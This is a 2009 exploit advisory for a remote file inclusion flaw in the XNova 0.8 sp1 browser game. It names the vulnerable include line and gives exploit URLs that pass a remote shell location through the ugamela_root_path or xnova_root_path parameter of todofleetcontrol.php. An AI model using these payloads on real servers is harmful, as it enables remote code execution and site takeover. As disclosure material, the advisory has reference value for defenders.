XNova 0.8 sp1 (xnova_root_path) Remote File Inclusion Vulnerability

2009.02.05
Credit: NuclearHaxor
Risk: High
Local: No
Remote: Yes
CWE: CWE-94

################################################################################################################################## Name: Xnova(Ogame) Remote File Inclusion Author : NuclearHaxor Contact MSN: nuclearhaxor@hotmail.com homepage of xnova: http://xnova.fr/ Vuln file: includes/todofleetcontrol.php Vuln line: include($ugamela_root_path . 'includes/functions/FlyingFleetHandler.'.$phpEx); -> but no declared ugamela_root_path ;) Exploit(this exploit works in 90% targets): ------ target.com/includes/todofleetcontrol.php?ugamela_root_path=[shell]? or new version of xnova: target.com/includes/todofleetcontrol.php?xnova_root_path=[shell]? ------ FUckZZz to Cybernet1c(2) aka ph4nt0mh4ck3r && Cr4wl aka Raz0r ##################################################################################################################################


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top